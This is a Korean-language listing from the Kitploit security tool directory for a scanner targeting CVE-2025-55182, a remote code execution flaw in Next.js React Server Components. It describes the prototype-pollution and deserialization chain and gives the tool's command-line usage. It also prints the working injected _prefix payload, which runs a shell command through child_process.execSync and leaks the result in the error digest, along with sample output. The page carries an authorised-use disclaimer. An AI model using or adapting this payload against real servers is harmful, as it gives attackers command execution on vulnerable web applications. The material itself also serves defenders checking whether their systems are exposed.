Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-Scanner — CVE-2025-55182를 위한 보안 스캐너 - React Server Components의 심각한 RCE 취약점 | Kitploit
도구/GitHubGitHub/f0xyx/cve-2025-55182-scanner
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

CVE-2025-55182를 위한 보안 스캐너 - React Server Components의 심각한 RCE 취약점

저장소 보기
18개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE‑2025‑55182 – Next.js RSC 역직렬화 RCE 스캐너

이 도구는 대상이 CVE‑2025‑55182에 취약한지 확인합니다. 이 버그는 Next.js 내에서 RSC(React Server Components) 모델 페이로드를 안전하지 않게 처리하여 발생하는 원격 코드 실행(RCE) 버그입니다.
취약점 체인은 프로토타입 오염(Prototype Pollution) → 역직렬화 남용(Deserialization Abuse) → 서버 측 JavaScript 실행(Server‑Side JavaScript Execution) 입니다.

면책 조항: 법적으로 소유하거나 명시적 권한이 있는 시스템에서만 사용하십시오. 무단 테스트 = 범죄입니다, 브로.


🔥 이 취약점이 작동하는 방식

Next.js는 내부적으로 multipart/form-data를 통해 전송된 특수 "model" 객체를 처리합니다.
공격자가 위조된 thenable과 같은 악성 구조를 주입하면, 다음을 오염시킬 수 있습니다:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • 및 기타 내부 요소들

이로 인해 서버가 공격자가 제어하는 JavaScript를 실행하게 되어 완전한 RCE가 발생합니다.


📌 이 스크립트가 수행하는 작업

  • 단일 URL (-u) 또는 대상 목록 (-l)을 입력받습니다
  • 조작된 multipart/역직렬화 페이로드를 전송합니다
  • 서버 오류 다이제스트에서 명령 출력 (id)을 추출합니다
  • 취약한 호스트를 foxvuln.txt에 저장합니다

▶ 사용법

단일 URL

root@kitploit:~
python3 main.py -u https://target.com

목록 모드

root@kitploit:~
python3 main.py -l list.txt

📦 페이로드 개요

페이로드는 주입된 _prefix를 통해 process.mainModule.require('child_process').execSync()를 악용합니다:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

이로 인해 서버가 id를 실행하고, 발생된 다이제스트 내에 결과를 노출시킵니다 (RSC 오류는 의도적으로 구조화된 "digest" 필드를 반환하기 때문입니다).


🧪 예제 출력

취약한 대상:

root@kitploit:~
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

취약하지 않은 경우:

root@kitploit:~
[+] Testing: https://secure.com
[NOT VULN]

🗂 출력 파일

확인된 모든 취약한 URL은 다음에 저장됩니다:

root@kitploit:~
foxvuln.txt

형식:

root@kitploit:~
https://victim.com => uid=1000(www-data)

🧠 참고 사항

  • Next.js RSC 스트리밍 페이로드를 처리하는 엔드포인트에서만 작동합니다
  • 경로를 무차별 대입하지 않습니다 — 호스트가 /에서 POST를 처리한다고 가정합니다
  • 호스트당 타임아웃은 10초로 설정됩니다
  • 실험실 환경에서는 완전히 안전하지만, 중범죄를 저지르고 싶지 않다면 임의의 서버에서 실행하지 마십시오

도구 다운로드